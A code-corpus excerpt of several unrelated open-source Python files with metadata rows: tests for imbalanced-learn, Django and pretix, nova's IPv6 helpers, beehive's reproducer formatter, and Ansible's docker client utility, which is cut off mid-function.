nm2 = NearMiss(random_state=RND_SEED, version=VERSION_NEARMISS)
nm2.fit(X, Y)
assert_raises(RuntimeError, nm2.sample, np.random.random((100, 40)),
np.array([0] * 50 + [1] * 50))
| bsd-3-clause | 2,205,732,359,631,018,200 | 29.485437 | 75 | 0.652389 | false |
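# Minimal usage sketch for the NearMiss-2 under-sampler exercised above, using
# the same dataset and constructor arguments as the tests. Note this matches
# the older imbalanced-learn API (`ratio`, `fit_sample`); later releases
# renamed these parameters and methods.
from collections import Counter
from sklearn.datasets import make_classification
from imblearn.under_sampling import NearMiss

X, y = make_classification(n_classes=2, class_sep=2, weights=[0.1, 0.9],
                           n_informative=3, n_redundant=1, flip_y=0,
                           n_features=20, n_clusters_per_class=1,
                           n_samples=5000, random_state=0)
nm2 = NearMiss(ratio='auto', version=2, random_state=0)
X_res, y_res = nm2.fit_sample(X, y)
print(Counter(y))      # {1: 4500, 0: 500} -- imbalanced input
print(Counter(y_res))  # {0: 500, 1: 500} -- majority class under-sampled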
gooddata/openstack-nova | nova/ipv6/account_identifier.py | 12 | 1904 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""IPv6 address generation with account identifier embedded."""
import hashlib
import netaddr
import six
from nova.i18n import _
def to_global(prefix, mac, project_id):
addr = project_id
if isinstance(addr, six.text_type):
addr = addr.encode('utf-8')
addr = hashlib.sha1(addr)
addr = int(addr.hexdigest()[:8], 16) << 32
project_hash = netaddr.IPAddress(addr)
static_num = netaddr.IPAddress(0xff << 24)
try:
mac_suffix = netaddr.EUI(mac).value & 0xffffff
mac_addr = netaddr.IPAddress(mac_suffix)
except netaddr.AddrFormatError:
raise TypeError(_('Bad mac for to_global_ipv6: %s') % mac)
try:
maskIP = netaddr.IPNetwork(prefix).ip
return (project_hash ^ static_num ^ mac_addr | maskIP).format()
except netaddr.AddrFormatError:
raise TypeError(_('Bad prefix for to_global_ipv6: %s') % prefix)
def to_mac(ipv6_address):
address = netaddr.IPAddress(ipv6_address)
mask1 = netaddr.IPAddress('::ff:ffff')
mac = netaddr.EUI(int(address & mask1)).words
return ':'.join(['02', '16', '3e'] + ['%02x' % i for i in mac[3:6]])
| apache-2.0 | 2,200,847,843,023,396,900 | 33.618182 | 78 | 0.684874 | false |
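# Usage sketch for the helpers above. It assumes the nova package and a
# compatible netaddr release are importable; the prefix, MAC and project id
# are arbitrary example values.
from nova.ipv6.account_identifier import to_global, to_mac

addr = to_global('2001:db8::/64', '02:16:3e:33:44:55', 'my-project')
print(addr)          # an address inside 2001:db8::/64; its low 24 bits encode the MAC suffix
print(to_mac(addr))  # expected to recover '02:16:3e:33:44:55'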
vrutkovs/beehive | beehive/formatter/reproducer.py | 1 | 5536 | # -*- coding: utf-8 -*-
from beehive.formatter.base import Formatter
import inspect
import re
import types
import os
try:
import importlib
except ImportError:
pass
class ReproducerFormatter(Formatter):
name = "reproducer"
description = "Script creating formatter"
def __init__(self, stream_opener, config, **kwargs):
super(ReproducerFormatter, self).__init__(stream_opener, config)
self.stream = self.open()
self.steps = []
# Get hooks code
self.hooks = self._import_hooks(config.env_py)
# Write a python encoding
self.stream.write('# -*- coding: utf-8 -*-\n\n')
# Write initial imports
imports = self._get_step_imports(config.env_py, config.steps_dir)
[self.stream.write(line) for line in imports]
self.stream.write('\n\n')
# Make a fake context object
self.stream.write('class Context:\n pass\n')
self.stream.write('context = Context()\n\n')
# Write before_all hook
self.stream.write(self.hooks['before_all'])
self.feature_counter = 0
def feature(self, feature):
if self.feature_counter != 0:
if self.scenario_counter != 0:
self.stream.write(self.hooks['after_scenario'])
self.stream.write(self.hooks['after_feature'])
self.stream.write(self.hooks['before_feature'])
self.feature_counter += 1
self.scenario_counter = 0
self.scenario_started = False
self.current_match = None
def match(self, match):
if match:
self.current_match = match
def result(self, result):
if result.status != 'skipped':
if not self.scenario_started:
self.stream.write(self.hooks['before_scenario'])
self.scenario_counter += 1
self.scenario_started = True
self.stream.write(self.hooks['before_step'])
self._write_code_for_function(self.current_match)
self.stream.write(self.hooks['after_step'])
def eof(self):
if self.feature_counter != 0:
if self.scenario_started:
self.stream.write(self.hooks['after_scenario'])
self.stream.write(self.hooks['after_feature'])
def close(self):
self.stream.write(self.hooks['after_all'])
def _load_module(self, file_path):
# Import and parse environment.py
# This is EXTREMELY dangerous - and I'm ashamed of that
path, _ = os.path.splitext(file_path)
file_name = path.split('/')[-1]
return importlib.import_module(file_name, path)
def _get_step_imports(self, env_file_path, steps_dir_path):
files = ['features/%s' % env_file_path]
imports = []
# Make a list of files with steps
for dirpath, dirnames, filenames in os.walk('features/%s' % steps_dir_path):
for filename in [f for f in filenames if f.endswith(".py")]:
files.append(os.path.join(dirpath, filename))
for step_file in files:
# Load direct imports
try:
with open(step_file) as f:
content = f.readlines()
for line in content:
if line.startswith('from ') or line.startswith('import '):
# Skip behave/beehive step import
if line.startswith('from beehive import ') or\
line.startswith('from behave import '):
continue
imports.append(line)
except IOError:
pass
return imports
def _import_hooks(self, env_file_path):
hooks = {}
known_hooks = [
'before_all', 'after_all',
'before_feature', 'after_feature',
'before_scenario', 'after_scenario',
'before_step', 'after_step']
env_file = self._load_module(env_file_path)
funcs = [x for x in dir(env_file) if isinstance(getattr(env_file, x), types.FunctionType)]
for hook_name in known_hooks:
func_code = ''
if hook_name in funcs and hasattr(env_file, hook_name):
func = getattr(env_file, hook_name)
func_code = inspect.getsourcelines(func)[0]
# Skip function declaration and unindent
func_code = '\n' + ''.join(self._strip_ident(func_code[1:]))
hooks[hook_name] = func_code
return hooks
def _strip_ident(self, lines):
ident_size = len(re.compile('([\t ]*)').match(lines[0]).group())
new_lines = []
for line in lines:
new_lines.append(line[ident_size:])
return new_lines
def _write_code_for_function(self, match):
self.stream.write('\n')
func_lines = inspect.getsourcelines(match.func)[0]
# Print func decorator
if func_lines[0].startswith('@'):
self.stream.write('# %s' % func_lines[0])
# Print func arguments first
for arg in match.arguments:
self.stream.write("%s = '%s'\n" % (arg.name, arg.value))
# Strip decorator, func declaration and detect identation
func_lines = self._strip_ident(func_lines[2:])
[self.stream.write(line) for line in func_lines]
# Unset arguments
for arg in match.arguments:
self.stream.write("del %s" % arg.name)
self.stream.write('\n')
| bsd-2-clause | 2,825,924,656,878,789,600 | 33.6 | 98 | 0.563945 | false |
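# Small standalone demo of the de-indentation step used by
# ReproducerFormatter._strip_ident() above: the leading whitespace of the
# first line determines how much is stripped from every line.
import re

def strip_ident(lines):
    ident_size = len(re.compile('([\t ]*)').match(lines[0]).group())
    return [line[ident_size:] for line in lines]

body = ["    x = 1\n", "    if x:\n", "        x += 1\n"]
print(''.join(strip_ident(body)))
# x = 1
# if x:
#     x += 1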
dvliman/jaikuengine | .google_appengine/lib/django-1.2/tests/modeltests/unmanaged_models/tests.py | 43 | 2187 | from django.test import TestCase
from django.db import connection
from models import Unmanaged1, Unmanaged2, Managed1
from models import A01, A02, B01, B02, C01, C02
class SimpleTests(TestCase):
def test_simple(self):
"""
        The main test here is that all the models can be created without
        any database errors. We can also do some more simple insertion and
        lookup tests whilst we're here to show that the second set of
        models does refer to the tables from the first set.
"""
# Insert some data into one set of models.
a = A01.objects.create(f_a="foo", f_b=42)
B01.objects.create(fk_a=a, f_a="fred", f_b=1729)
c = C01.objects.create(f_a="barney", f_b=1)
c.mm_a = [a]
# ... and pull it out via the other set.
a2 = A02.objects.all()[0]
self.assertTrue(isinstance(a2, A02))
self.assertEqual(a2.f_a, "foo")
b2 = B02.objects.all()[0]
self.assertTrue(isinstance(b2, B02))
self.assertEqual(b2.f_a, "fred")
self.assertTrue(isinstance(b2.fk_a, A02))
self.assertEqual(b2.fk_a.f_a, "foo")
self.assertEqual(list(C02.objects.filter(f_a=None)), [])
resp = list(C02.objects.filter(mm_a=a.id))
self.assertEqual(len(resp), 1)
self.assertTrue(isinstance(resp[0], C02))
self.assertEqual(resp[0].f_a, 'barney')
class ManyToManyUnmanagedTests(TestCase):
def test_many_to_many_between_unmanaged(self):
"""
The intermediary table between two unmanaged models should not be created.
"""
table = Unmanaged2._meta.get_field('mm').m2m_db_table()
tables = connection.introspection.table_names()
self.assert_(table not in tables, "Table '%s' should not exist, but it does." % table)
def test_many_to_many_between_unmanaged_and_managed(self):
"""
An intermediary table between a managed and an unmanaged model should be created.
"""
table = Managed1._meta.get_field('mm').m2m_db_table()
tables = connection.introspection.table_names()
self.assert_(table in tables, "Table '%s' does not exist." % table)
| apache-2.0 | -5,822,228,236,947,279,000 | 36.706897 | 94 | 0.629172 | false |
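# For reference, this is the kind of declaration the paired A01/A02 models in
# models.py rely on: two model classes sharing one table, the second marked
# unmanaged so Django never tries to create or drop it. The field, table and
# app names here are illustrative, not copied from the test's models.py.
from django.db import models

class Managed(models.Model):
    f_a = models.CharField(max_length=10)

    class Meta:
        app_label = 'demo'
        db_table = 'demo_shared_table'

class Mirror(models.Model):
    f_a = models.CharField(max_length=10)

    class Meta:
        app_label = 'demo'
        db_table = 'demo_shared_table'
        managed = False   # no table creation/deletion for this model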
akuks/pretix | src/tests/base/test_i18n.py | 3 | 3926 | from django.test import TestCase
from django.utils import translation
from django.utils.timezone import now
from pretix.base.i18n import LazyI18nString
from pretix.base.models import Event, ItemCategory, Organizer
class I18nStringTest(TestCase):
"""
This test case tests the LazyI18nString class
"""
def test_explicit_translation(self):
data = {
'de': 'Hallo',
'en': 'Hello'
}
s = LazyI18nString(data)
translation.activate('en')
self.assertEqual(str(s), 'Hello')
translation.activate('de')
self.assertEqual(str(s), 'Hallo')
def test_similar_translations(self):
data = {
'en': 'You',
'de': 'Sie',
'de-informal': 'Du'
}
s = LazyI18nString(data)
translation.activate('de')
self.assertEqual(str(s), 'Sie')
translation.activate('de-informal')
self.assertEqual(str(s), 'Du')
data = {
'en': 'You',
'de-informal': 'Du'
}
s = LazyI18nString(data)
translation.activate('de')
self.assertEqual(str(s), 'Du')
translation.activate('de-informal')
self.assertEqual(str(s), 'Du')
data = {
'en': 'You',
'de': 'Sie'
}
s = LazyI18nString(data)
translation.activate('de')
self.assertEqual(str(s), 'Sie')
translation.activate('de-informal')
self.assertEqual(str(s), 'Sie')
def test_missing_default_translation(self):
data = {
'de': 'Hallo',
}
s = LazyI18nString(data)
translation.activate('en')
self.assertEqual(str(s), 'Hallo')
translation.activate('de')
self.assertEqual(str(s), 'Hallo')
def test_missing_translation(self):
data = {
'en': 'Hello',
}
s = LazyI18nString(data)
translation.activate('en')
self.assertEqual(str(s), 'Hello')
translation.activate('de')
self.assertEqual(str(s), 'Hello')
def test_legacy_string(self):
s = LazyI18nString("Hello")
translation.activate('en')
self.assertEqual(str(s), 'Hello')
translation.activate('de')
self.assertEqual(str(s), 'Hello')
def test_none(self):
s = LazyI18nString(None)
self.assertEqual(str(s), "")
s = LazyI18nString("")
self.assertEqual(str(s), "")
class I18nFieldTest(TestCase):
"""
This test case tests the I18n*Field classes
"""
@classmethod
def setUpTestData(cls):
o = Organizer.objects.create(name='Dummy', slug='dummy')
cls.event = Event.objects.create(
organizer=o, name='Dummy', slug='dummy',
date_from=now(),
)
def test_save_load_cycle_plain_string(self):
obj = ItemCategory.objects.create(event=self.event, name="Hello")
obj = ItemCategory.objects.get(id=obj.id)
self.assertIsInstance(obj.name, LazyI18nString)
translation.activate('en')
self.assertEqual(str(obj.name), "Hello")
translation.activate('de')
self.assertEqual(str(obj.name), "Hello")
def test_save_load_cycle_i18n_string(self):
obj = ItemCategory.objects.create(event=self.event,
name=LazyI18nString(
{
'de': 'Hallo',
'en': 'Hello'
}
))
obj = ItemCategory.objects.get(id=obj.id)
self.assertIsInstance(obj.name, LazyI18nString)
translation.activate('en')
self.assertEqual(str(obj.name), "Hello")
translation.activate('de')
self.assertEqual(str(obj.name), "Hallo")
| apache-2.0 | -6,858,432,299,231,836,000 | 30.408 | 73 | 0.534641 | false |
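# Plain-Python sketch of the fallback order the tests above assert for
# LazyI18nString: the exact language wins, then a "similar" language sharing
# the same base code (de-informal <-> de), then any available translation.
# This mimics the observed behaviour; it is not pretix's implementation.
def resolve(data, lang):
    if data.get(lang):
        return data[lang]
    base = lang.split('-')[0]
    similar = [v for k, v in data.items() if k == base or k.startswith(base + '-')]
    if similar:
        return similar[0]
    return next(iter(data.values()))

data = {'en': 'You', 'de-informal': 'Du'}
print(resolve(data, 'de'))             # 'Du'  (falls back to the informal variant)
print(resolve(data, 'de-informal'))    # 'Du'
print(resolve({'de': 'Hallo'}, 'en'))  # 'Hallo' (any available translation)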
thaumos/ansible | lib/ansible/module_utils/docker/common.py | 8 | 39414 | #
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import os
import re
from datetime import timedelta
from distutils.version import LooseVersion
from ansible.module_utils.basic import AnsibleModule, env_fallback
from ansible.module_utils.common._collections_compat import Mapping, Sequence
from ansible.module_utils.six import string_types
from ansible.module_utils.six.moves.urllib.parse import urlparse
from ansible.module_utils.parsing.convert_bool import BOOLEANS_TRUE, BOOLEANS_FALSE
HAS_DOCKER_PY = True
HAS_DOCKER_PY_2 = False
HAS_DOCKER_PY_3 = False
HAS_DOCKER_ERROR = None
try:
from requests.exceptions import SSLError
from docker import __version__ as docker_version
from docker.errors import APIError, NotFound, TLSParameterError
from docker.tls import TLSConfig
from docker import auth
if LooseVersion(docker_version) >= LooseVersion('3.0.0'):
HAS_DOCKER_PY_3 = True
from docker import APIClient as Client
elif LooseVersion(docker_version) >= LooseVersion('2.0.0'):
HAS_DOCKER_PY_2 = True
from docker import APIClient as Client
else:
from docker import Client
except ImportError as exc:
HAS_DOCKER_ERROR = str(exc)
HAS_DOCKER_PY = False
# The next 2 imports ``docker.models`` and ``docker.ssladapter`` are used
# to ensure the user does not have both ``docker`` and ``docker-py`` modules
# installed, as they utilize the same namespace and are incompatible
try:
# docker (Docker SDK for Python >= 2.0.0)
import docker.models # noqa: F401
HAS_DOCKER_MODELS = True
except ImportError:
HAS_DOCKER_MODELS = False
try:
# docker-py (Docker SDK for Python < 2.0.0)
import docker.ssladapter # noqa: F401
HAS_DOCKER_SSLADAPTER = True
except ImportError:
HAS_DOCKER_SSLADAPTER = False
DEFAULT_DOCKER_HOST = 'unix://var/run/docker.sock'
DEFAULT_TLS = False
DEFAULT_TLS_VERIFY = False
DEFAULT_TLS_HOSTNAME = 'localhost'
MIN_DOCKER_VERSION = "1.8.0"
DEFAULT_TIMEOUT_SECONDS = 60
DOCKER_COMMON_ARGS = dict(
docker_host=dict(type='str', default=DEFAULT_DOCKER_HOST, fallback=(env_fallback, ['DOCKER_HOST']), aliases=['docker_url']),
tls_hostname=dict(type='str', default=DEFAULT_TLS_HOSTNAME, fallback=(env_fallback, ['DOCKER_TLS_HOSTNAME'])),
api_version=dict(type='str', default='auto', fallback=(env_fallback, ['DOCKER_API_VERSION']), aliases=['docker_api_version']),
timeout=dict(type='int', default=DEFAULT_TIMEOUT_SECONDS, fallback=(env_fallback, ['DOCKER_TIMEOUT'])),
ca_cert=dict(type='path', aliases=['tls_ca_cert', 'cacert_path']),
client_cert=dict(type='path', aliases=['tls_client_cert', 'cert_path']),
client_key=dict(type='path', aliases=['tls_client_key', 'key_path']),
ssl_version=dict(type='str', fallback=(env_fallback, ['DOCKER_SSL_VERSION'])),
tls=dict(type='bool', default=DEFAULT_TLS, fallback=(env_fallback, ['DOCKER_TLS'])),
validate_certs=dict(type='bool', default=DEFAULT_TLS_VERIFY, fallback=(env_fallback, ['DOCKER_TLS_VERIFY']), aliases=['tls_verify']),
debug=dict(type='bool', default=False)
)
DOCKER_MUTUALLY_EXCLUSIVE = []
DOCKER_REQUIRED_TOGETHER = [
['client_cert', 'client_key']
]
DEFAULT_DOCKER_REGISTRY = 'https://index.docker.io/v1/'
EMAIL_REGEX = r'[^@]+@[^@]+\.[^@]+'
BYTE_SUFFIXES = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
if not HAS_DOCKER_PY:
docker_version = None
# No Docker SDK for Python. Create a place holder client to allow
# instantiation of AnsibleModule and proper error handing
class Client(object): # noqa: F811
def __init__(self, **kwargs):
pass
class APIError(Exception): # noqa: F811
pass
class NotFound(Exception): # noqa: F811
pass
def is_image_name_id(name):
"""Checks whether the given image name is in fact an image ID (hash)."""
if re.match('^sha256:[0-9a-fA-F]{64}$', name):
return True
return False
def sanitize_result(data):
"""Sanitize data object for return to Ansible.
When the data object contains types such as docker.types.containers.HostConfig,
Ansible will fail when these are returned via exit_json or fail_json.
HostConfig is derived from dict, but its constructor requires additional
arguments. This function sanitizes data structures by recursively converting
everything derived from dict to dict and everything derived from list (and tuple)
to a list.
"""
if isinstance(data, dict):
return dict((k, sanitize_result(v)) for k, v in data.items())
elif isinstance(data, (list, tuple)):
return [sanitize_result(v) for v in data]
else:
return data
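# Illustrative sketch (defined here for documentation, not used by the
# module): sanitize_result() flattens dict- and list-derived types such as
# docker.types.HostConfig into plain dicts and lists so they can be returned
# through exit_json/fail_json.
def _sanitize_result_example():
    class TaggedDict(dict):
        pass
    raw = TaggedDict(Image='busybox', Mounts=(TaggedDict(Source='/tmp'),))
    clean = sanitize_result(raw)
    # clean is a plain dict and clean['Mounts'] is a plain list of dicts
    return clean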
class DockerBaseClass(object):
def __init__(self):
self.debug = False
def log(self, msg, pretty_print=False):
pass
# if self.debug:
# log_file = open('docker.log', 'a')
# if pretty_print:
# log_file.write(json.dumps(msg, sort_keys=True, indent=4, separators=(',', ': ')))
# log_file.write(u'\n')
# else:
# log_file.write(msg + u'\n')
def update_tls_hostname(result):
if result['tls_hostname'] is None:
# get default machine name from the url
parsed_url = urlparse(result['docker_host'])
if ':' in parsed_url.netloc:
result['tls_hostname'] = parsed_url.netloc[:parsed_url.netloc.rindex(':')]
else:
            result['tls_hostname'] = parsed_url.netloc
def _get_tls_config(fail_function, **kwargs):
try:
tls_config = TLSConfig(**kwargs)
return tls_config
except TLSParameterError as exc:
fail_function("TLS config error: %s" % exc)
def get_connect_params(auth, fail_function):
if auth['tls'] or auth['tls_verify']:
auth['docker_host'] = auth['docker_host'].replace('tcp://', 'https://')
if auth['tls_verify'] and auth['cert_path'] and auth['key_path']:
# TLS with certs and host verification
if auth['cacert_path']:
tls_config = _get_tls_config(client_cert=(auth['cert_path'], auth['key_path']),
ca_cert=auth['cacert_path'],
verify=True,
assert_hostname=auth['tls_hostname'],
ssl_version=auth['ssl_version'],
fail_function=fail_function)
else:
tls_config = _get_tls_config(client_cert=(auth['cert_path'], auth['key_path']),
verify=True,
assert_hostname=auth['tls_hostname'],
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls_verify'] and auth['cacert_path']:
# TLS with cacert only
tls_config = _get_tls_config(ca_cert=auth['cacert_path'],
assert_hostname=auth['tls_hostname'],
verify=True,
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls_verify']:
# TLS with verify and no certs
tls_config = _get_tls_config(verify=True,
assert_hostname=auth['tls_hostname'],
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls'] and auth['cert_path'] and auth['key_path']:
# TLS with certs and no host verification
tls_config = _get_tls_config(client_cert=(auth['cert_path'], auth['key_path']),
verify=False,
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
if auth['tls']:
# TLS with no certs and not host verification
tls_config = _get_tls_config(verify=False,
ssl_version=auth['ssl_version'],
fail_function=fail_function)
return dict(base_url=auth['docker_host'],
tls=tls_config,
version=auth['api_version'],
timeout=auth['timeout'])
# No TLS
return dict(base_url=auth['docker_host'],
version=auth['api_version'],
timeout=auth['timeout'])
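# Illustrative sketch (defined here for documentation, not called by the
# module): for a TLS-verified tcp:// host with only a CA certificate,
# get_connect_params() takes the "TLS with cacert only" branch above. The
# host and path are made-up values; docker's TLSConfig validates that the CA
# file exists, so actually calling this requires a real certificate path.
def _connect_params_example():
    auth = dict(docker_host='tcp://192.0.2.10:2376', tls_hostname='192.0.2.10',
                api_version='auto', timeout=60, cacert_path='/tmp/ca.pem',
                cert_path=None, key_path=None, ssl_version=None,
                tls=False, tls_verify=True)
    return get_connect_params(auth, fail_function=lambda msg: None)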
DOCKERPYUPGRADE_SWITCH_TO_DOCKER = "Try `pip uninstall docker-py` followed by `pip install docker`."
DOCKERPYUPGRADE_UPGRADE_DOCKER = "Use `pip install --upgrade docker` to upgrade."
DOCKERPYUPGRADE_RECOMMEND_DOCKER = ("Use `pip install --upgrade docker-py` to upgrade. "
"Hint: if you do not need Python 2.6 support, try "
"`pip uninstall docker-py` instead followed by `pip install docker`.")
class AnsibleDockerClient(Client):
def __init__(self, argument_spec=None, supports_check_mode=False, mutually_exclusive=None,
required_together=None, required_if=None, min_docker_version=MIN_DOCKER_VERSION,
min_docker_api_version=None, option_minimal_versions=None,
option_minimal_versions_ignore_params=None, fail_results=None):
# Modules can put information in here which will always be returned
# in case client.fail() is called.
self.fail_results = fail_results or {}
merged_arg_spec = dict()
merged_arg_spec.update(DOCKER_COMMON_ARGS)
if argument_spec:
merged_arg_spec.update(argument_spec)
self.arg_spec = merged_arg_spec
mutually_exclusive_params = []
mutually_exclusive_params += DOCKER_MUTUALLY_EXCLUSIVE
if mutually_exclusive:
mutually_exclusive_params += mutually_exclusive
required_together_params = []
required_together_params += DOCKER_REQUIRED_TOGETHER
if required_together:
required_together_params += required_together
self.module = AnsibleModule(
argument_spec=merged_arg_spec,
supports_check_mode=supports_check_mode,
mutually_exclusive=mutually_exclusive_params,
required_together=required_together_params,
required_if=required_if)
NEEDS_DOCKER_PY2 = (LooseVersion(min_docker_version) >= LooseVersion('2.0.0'))
self.docker_py_version = LooseVersion(docker_version)
if HAS_DOCKER_MODELS and HAS_DOCKER_SSLADAPTER:
self.fail("Cannot have both the docker-py and docker python modules (old and new version of Docker "
"SDK for Python) installed together as they use the same namespace and cause a corrupt "
"installation. Please uninstall both packages, and re-install only the docker-py or docker "
"python module. It is recommended to install the docker module if no support for Python 2.6 "
"is required. Please note that simply uninstalling one of the modules can leave the other "
"module in a broken state.")
if not HAS_DOCKER_PY:
if NEEDS_DOCKER_PY2:
msg = "Failed to import docker (Docker SDK for Python) - %s. Try `pip install docker`."
else:
msg = "Failed to import docker or docker-py (Docker SDK for Python) - %s. Try `pip install docker` or `pip install docker-py` (Python 2.6)."
self.fail(msg % HAS_DOCKER_ERROR)
if self.docker_py_version < LooseVersion(min_docker_version):
msg = "Error: Docker SDK for Python version is %s. Minimum version required is %s. "
if not NEEDS_DOCKER_PY2:
# The minimal required version is < 2.0 (and the current version as well).
# Advertise docker (instead of docker-py) for non-Python-2.6 users.
msg += DOCKERPYUPGRADE_RECOMMEND_DOCKER
elif docker_version < LooseVersion('2.0'):
msg += DOCKERPYUPGRADE_SWITCH_TO_DOCKER
else:
msg += DOCKERPYUPGRADE_UPGRADE_DOCKER
self.fail(msg % (docker_version, min_docker_version))
self.debug = self.module.params.get('debug')
self.check_mode = self.module.check_mode
self._connect_params = get_connect_params(self.auth_params, fail_function=self.fail)
try:
super(AnsibleDockerClient, self).__init__(**self._connect_params)
except APIError as exc:
self.fail("Docker API error: %s" % exc)
except Exception as exc:
self.fail("Error connecting: %s" % exc)
if min_docker_api_version is not None:
self.docker_api_version_str = self.version()['ApiVersion']
self.docker_api_version = LooseVersion(self.docker_api_version_str)
if self.docker_api_version < LooseVersion(min_docker_api_version):
self.fail('Docker API version is %s. Minimum version required is %s.' % (self.docker_api_version_str, min_docker_api_version))
if option_minimal_versions is not None:
self._get_minimal_versions(option_minimal_versions, option_minimal_versions_ignore_params)
def log(self, msg, pretty_print=False):
pass
# if self.debug:
# log_file = open('docker.log', 'a')
# if pretty_print:
# log_file.write(json.dumps(msg, sort_keys=True, indent=4, separators=(',', ': ')))
# log_file.write(u'\n')
# else:
# log_file.write(msg + u'\n')
def fail(self, msg, **kwargs):
self.fail_results.update(kwargs)
self.module.fail_json(msg=msg, **sanitize_result(self.fail_results))
@staticmethod
def _get_value(param_name, param_value, env_variable, default_value):
if param_value is not None:
# take module parameter value
if param_value in BOOLEANS_TRUE:
return True
if param_value in BOOLEANS_FALSE:
return False
return param_value
if env_variable is not None:
env_value = os.environ.get(env_variable)
if env_value is not None:
# take the env variable value
if param_name == 'cert_path':
return os.path.join(env_value, 'cert.pem')
if param_name == 'cacert_path':
return os.path.join(env_value, 'ca.pem')
if param_name == 'key_path':
return os.path.join(env_value, 'key.pem')
if env_value in BOOLEANS_TRUE:
return True
if env_value in BOOLEANS_FALSE:
return False
return env_value
# take the default
return default_value
@property
def auth_params(self):
# Get authentication credentials.
# Precedence: module parameters-> environment variables-> defaults.
self.log('Getting credentials')
params = dict()
for key in DOCKER_COMMON_ARGS:
params[key] = self.module.params.get(key)
if self.module.params.get('use_tls'):
# support use_tls option in docker_image.py. This will be deprecated.
use_tls = self.module.params.get('use_tls')
if use_tls == 'encrypt':
params['tls'] = True
if use_tls == 'verify':
params['validate_certs'] = True
result = dict(
docker_host=self._get_value('docker_host', params['docker_host'], 'DOCKER_HOST',
DEFAULT_DOCKER_HOST),
tls_hostname=self._get_value('tls_hostname', params['tls_hostname'],
'DOCKER_TLS_HOSTNAME', DEFAULT_TLS_HOSTNAME),
api_version=self._get_value('api_version', params['api_version'], 'DOCKER_API_VERSION',
'auto'),
cacert_path=self._get_value('cacert_path', params['ca_cert'], 'DOCKER_CERT_PATH', None),
cert_path=self._get_value('cert_path', params['client_cert'], 'DOCKER_CERT_PATH', None),
key_path=self._get_value('key_path', params['client_key'], 'DOCKER_CERT_PATH', None),
ssl_version=self._get_value('ssl_version', params['ssl_version'], 'DOCKER_SSL_VERSION', None),
tls=self._get_value('tls', params['tls'], 'DOCKER_TLS', DEFAULT_TLS),
tls_verify=self._get_value('tls_verfy', params['validate_certs'], 'DOCKER_TLS_VERIFY',
DEFAULT_TLS_VERIFY),
timeout=self._get_value('timeout', params['timeout'], 'DOCKER_TIMEOUT',
DEFAULT_TIMEOUT_SECONDS),
)
update_tls_hostname(result)
return result
def _handle_ssl_error(self, error):
match = re.match(r"hostname.*doesn\'t match (\'.*\')", str(error))
if match:
self.fail("You asked for verification that Docker daemons certificate's hostname matches %s. "
"The actual certificate's hostname is %s. Most likely you need to set DOCKER_TLS_HOSTNAME "
"or pass `tls_hostname` with a value of %s. You may also use TLS without verification by "
"setting the `tls` parameter to true."
% (self.auth_params['tls_hostname'], match.group(1), match.group(1)))
self.fail("SSL Exception: %s" % (error))
def _get_minimal_versions(self, option_minimal_versions, ignore_params=None):
self.option_minimal_versions = dict()
for option in self.module.argument_spec:
if ignore_params is not None:
if option in ignore_params:
continue
self.option_minimal_versions[option] = dict()
self.option_minimal_versions.update(option_minimal_versions)
for option, data in self.option_minimal_versions.items():
# Test whether option is supported, and store result
support_docker_py = True
support_docker_api = True
if 'docker_py_version' in data:
support_docker_py = self.docker_py_version >= LooseVersion(data['docker_py_version'])
if 'docker_api_version' in data:
support_docker_api = self.docker_api_version >= LooseVersion(data['docker_api_version'])
data['supported'] = support_docker_py and support_docker_api
# Fail if option is not supported but used
if not data['supported']:
# Test whether option is specified
if 'detect_usage' in data:
used = data['detect_usage'](self)
else:
used = self.module.params.get(option) is not None
if used and 'default' in self.module.argument_spec[option]:
used = self.module.params[option] != self.module.argument_spec[option]['default']
if used:
# If the option is used, compose error message.
if 'usage_msg' in data:
usg = data['usage_msg']
else:
usg = 'set %s option' % (option, )
if not support_docker_api:
msg = 'Docker API version is %s. Minimum version required is %s to %s.'
msg = msg % (self.docker_api_version_str, data['docker_api_version'], usg)
elif not support_docker_py:
msg = "Docker SDK for Python version is %s. Minimum version required is %s to %s. "
if LooseVersion(data['docker_py_version']) < LooseVersion('2.0.0'):
msg += DOCKERPYUPGRADE_RECOMMEND_DOCKER
elif self.docker_py_version < LooseVersion('2.0.0'):
msg += DOCKERPYUPGRADE_SWITCH_TO_DOCKER
else:
msg += DOCKERPYUPGRADE_UPGRADE_DOCKER
msg = msg % (docker_version, data['docker_py_version'], usg)
else:
# should not happen
msg = 'Cannot %s with your configuration.' % (usg, )
self.fail(msg)
def get_container(self, name=None):
'''
Lookup a container and return the inspection results.
'''
if name is None:
return None
search_name = name
if not name.startswith('/'):
search_name = '/' + name
result = None
try:
for container in self.containers(all=True):
self.log("testing container: %s" % (container['Names']))
if isinstance(container['Names'], list) and search_name in container['Names']:
result = container
break
if container['Id'].startswith(name):
result = container
break
if container['Id'] == name:
result = container
break
except SSLError as exc:
self._handle_ssl_error(exc)
except Exception as exc:
self.fail("Error retrieving container list: %s" % exc)
